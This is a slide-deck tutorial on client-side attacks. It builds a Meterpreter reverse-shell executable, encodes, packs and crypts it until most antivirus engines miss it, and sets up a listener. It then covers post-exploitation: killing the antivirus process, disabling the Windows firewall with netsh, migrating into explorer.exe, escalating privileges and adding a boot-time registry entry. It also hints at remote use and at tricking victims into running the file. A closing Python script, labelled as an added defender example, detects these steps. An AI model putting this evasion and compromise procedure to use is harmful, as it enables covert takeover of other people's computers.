
Client side exploits



  1. Client Side Exploits: Metasploit, Meterpreter, Obfuscation, Rogue Websites and Ettercap.
  2. Tools
     • Kali Linux: Metasploit (msfconsole, msfpayload, msfencode), Ettercap, Apache
     • Windows: Nemesis Crypter, .Net Shrink, DeepSea Obfuscator
  3. Testing Environment pt.1
     All examples shown will be performed in a controlled network; I do not condone the use of these methods in the wild.
     Diagram: Host Computer on the Host Network running a Virtualised Environment (Oracle VirtualBox); inside it a Virtual Router (pfSense) with WAN and LAN interfaces, an Attacker (Kali) and a Client (Win7).
  4. Testing Environment pt.2 – VirtualBox Configuration
     1. Download pfSense ISO (
     2. Create new VM using wizard
     3. Install 2 NICs
     4. NIC 1 should be configured to use NAT
     5. NIC 2 should be configured to use Internal Network
  5. Testing Environment pt.3 – Kali Linux Configuration
     1. apt-get update, upgrade, dist-upgrade, install -y linux-headers-$(uname -r)
     2. cp /media/cd-rom/ /root/
     3. chmod 755 /root/
     4. cd /root ./
     5. update-rc.d postgresql enable; update-rc.d metasploit enable; msfupdate
  6. Metasploit pt.1 – Payload Creation
     • Using msfpayload –h we can see all the available options.
     • Using –l will show all of the available payloads; for this example we will be generating a meterpreter shell to connect back to the attacker due to its flexibility.
     • Selecting the meterpreter reverse tcp payload.
     • Using msfpayload windows/meterpreter/reverse_tcp O will give us the payload options which we will input in the next step.
     • X to create an executable.
     • > pay.exe – exports the payload to filename pay.exe.
     • We will now have the executable pay.exe on our desktop.
     Here we can choose how to output the payload: we can export to C or Ruby for later compiling, or we can export to Java if we wanted to create an applet attack. For this example however we will be exporting to an executable for an infectious media attack.
     We have 2 configurable options for this payload:
     1. LHOST – this is the address of the attacking machine (for this lab we will use a local address, however you can use an external address for a remote attack).
     2. LPORT – this is the port used to connect back to the attacker; for this lab we will use port 4444, however if you are behind a restrictive firewall you may want to select a port that will be open, e.g. 443 (ssl) or 53 (dns). Also, if this is a remote attack you would have to port forward the selected port.
  7. Checking Our Work
     • Uploading the file to Metascan will check our payload against 43 antivirus scanning engines.
     • Unfortunately the payload we created was detected 26 times; we now have to work on lowering this detection rate.
  8. Metasploit pt.2 – Payload Encoding
     We use msfencode with the same command, however we now use the switch “R” to output the file as RAW and use “|” to pipe the file into msfencode.
     • The raw output of the previous command is piped into another encoder using “|”.
     • We use msfencode –e x86/countdown –c 5 –t exe –o payenc.exe to encode the file again and then output the result to payenc.exe.
     Note: this is by no means a comprehensive coverage of msfpayload or msfencode; I suggest reading Metasploit: The Penetration Tester’s Guide for full usage of these tools.
     msfencode:
     • -e – selects the encoder (in the example shikata_ga_nai is used)
     • -c – sets the number of times the payload is encoded
     • -t – sets the output file to RAW
     Lastly we will pack our file to add an extra layer of obscurity using the following command: Upx -9 payenc.exe payencpacked.exe
  9. Checking Our Work
     • Uploading the file shows the results are not good; antivirus vendors are getting wise to the encoders we used.
     • We now need to utilise some other methods to obfuscate the payload further.
  10. Obfuscation pt.1 – Over to you Windows: Nemesis Crypter
     1. Main – select location of file
     2. Options – set the encryption algorithm to AES
     3. Assembly Information – set to random
     4. Crypt file
  11. Checking Our Work – Notice a Pattern Emerging
     • OK, so that’s a good enough detection rate.
     • It's interesting to note that all the free antivirus vendors failed to detect our payload (AVG, I'm looking at you) whilst Norton and Kaspersky still detected it, thus highlighting the need to PAY for a good antivirus.
  12. Obfuscation pt.2 – .Net Shrink, DeepSea Obfuscator, .Net Reactor
     • No one method is foolproof; however, there are hundreds of tools to further obfuscate your payload, you just need to experiment.
     • Antivirus vendors will eventually become wise to all encoders and obfuscators. I hope this highlights the importance of having a good antivirus (remember to laugh at Apple fanboys when they say they are immune to viruses).
  13. Where are we now
     We now have a payload that has a low detection rate... what do we do now? Two things need to be accomplished:
     1. We need a method for the payload to connect from the client machine to the attacking machine (this is a client side attack, remember).
     2. We need a way to get the victim to execute the payload (think social engineering; I will look forward to hearing your ideas).
  14. Metasploit pt.3
     • Remember that we programmed our payload to reverse connect to
     • We now need to set Metasploit to listen for connections on
     • Start Metasploit using msfconsole
     • Starts listening for client connections
  15. Metasploit pt.3 cont.
     • set LHOST – sets the listen address, which is the IP of the attacker machine
     • set LPORT – sets the listen port
     • exploit – starts the listener
     The attacking machine is now ready to accept incoming connections.
  16. • User on client machine clicks malicious file
     • Notice that nothing suspicious happens
     • User assumes that it is just a broken file
     • Little do they know...
     Meanwhile the attacker machine has accepted a remote connection from the client. A meterpreter session is now open.
  17. If we issue a netstat –a on the client machine to list all remote connections we see the connection from (the client) to (the attacker).
  18. Meterpreter Post-Exploitation
     We have our meterpreter session to the client machine; we now need to ensure the client stays compromised:
     1. Kill any antivirus (although our payload hasn't been detected, any future modifications may reveal the payload to the antivirus).
     2. Kill firewall
     3. Migrate the meterpreter session to a secure process
     4. Elevate our privileges
     5. Make our meterpreter session persistent through reboots
  19. • idletime – we don’t want to run these commands when the user is present
     • ps – shows the running processes on the client machine
     • We now need to disable the antivirus; in this case the client is running Security Essentials, msseces.exe = 2356, so we issue kill 2356 (note: it is useful to familiarise yourself with the processes other antivirus packages use).
     • Currently meterpreter is running as process “abc.exe”, which is highly suspicious; using the migrate command we will run meterpreter as “explorer.exe” (note: when using meterpreter we use the PID number rather than the process name, e.g. explorer.exe = 1424).
     • Using “getsystem” and “getprivs” gives us the system user account and all the associated privileges.
     • Using “shell” we drop down into the Windows command line and issue the command “netsh advfirewall set allprofiles state off”. The Windows firewall is now off.
     The system is now defenceless and we have complete control. I hope this slide has demonstrated the multidisciplinary nature of hacking by using both the Linux and Windows command line. I would recommend reading the following texts to further familiarise yourselves with both command lines.
  20. Meterpreter – Maintaining Access
     1. Use the “shell” command to get a Windows command prompt
     2. We are now going to add a registry key that executes the payload at every boot by using the command reg add “path to registry key”
     3. /v names the registry key
     4. /t specifies the key type
     5. /d defines the path to our executable
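Every step in slides 17 to 20 leaves a trace in ordinary host telemetry: the firewall being switched off via netsh, the antivirus process (msseces.exe) being terminated, a boot-time entry written with reg add, and the migrated session in explorer.exe talking to the listener port 4444. The Python below is an added defender-side example, not part of the original deck: it runs a few triage rules over constructed Sysmon-style events. The event field names, the assumption that the persistence entry lands under a CurrentVersion\Run key (the slide only says "path to registry key"), and the set of antivirus image names are all assumptions.

```python
import ntpath
import re

# Constructed Sysmon-style events (sample data, not from the original slides).
# Field names and event kinds are assumptions about the telemetry in use.
SAMPLE_EVENTS = [
    {"kind": "create", "pid": 4120, "image": r"C:\Windows\System32\netsh.exe",
     "cmd": "netsh advfirewall set allprofiles state off"},
    {"kind": "create", "pid": 4133, "image": r"C:\Windows\System32\reg.exe",
     "cmd": r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" '
            r'/v svc /t REG_SZ /d C:\Users\u\AppData\Local\Temp\pay.exe'},
    {"kind": "terminate", "pid": 2356, "cmd": "",
     "image": r"C:\Program Files\Microsoft Security Client\msseces.exe"},
    {"kind": "create", "pid": 4140, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd.exe /c dir"},
    {"kind": "network", "pid": 1424, "image": r"C:\Windows\explorer.exe",
     "cmd": "", "dst_port": 4444},
]

# Command-line patterns for the post-exploitation commands shown in the slides.
COMMAND_RULES = [
    ("firewall_disabled",
     re.compile(r"\bnetsh\s+advfirewall\s+set\s+\w+\s+state\s+off\b", re.I)),
    # Run-key persistence is an assumption: the slide only says "path to registry key".
    ("run_key_persistence",
     re.compile(r"\breg\s+add\b.*\\CurrentVersion\\Run\b", re.I)),
]
AV_IMAGES = {"msseces.exe"}   # Security Essentials process named in the slides
LISTENER_PORTS = {4444}       # default LPORT used in the slides


def triage(events):
    """Return (rule, pid) findings for events matching the slides' steps."""
    findings = []
    for ev in events:
        exe = ntpath.basename(ev["image"]).lower()   # Windows paths on any host OS
        if ev["kind"] == "create":
            for name, rx in COMMAND_RULES:
                if rx.search(ev["cmd"]):
                    findings.append((name, ev["pid"]))
        elif ev["kind"] == "terminate" and exe in AV_IMAGES:
            findings.append(("av_process_terminated", ev["pid"]))
        elif ev["kind"] == "network" and ev.get("dst_port") in LISTENER_PORTS:
            # explorer.exe (the migration target) has no business on a listener port.
            findings.append(("outbound_to_default_listener_port", ev["pid"]))
    return findings


if __name__ == "__main__":
    for rule, pid in triage(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

The slides' own counter-steps (migration, getsystem) are not visible in command lines, so a real deployment would pair these rules with process-access and privilege-change events rather than rely on them alone.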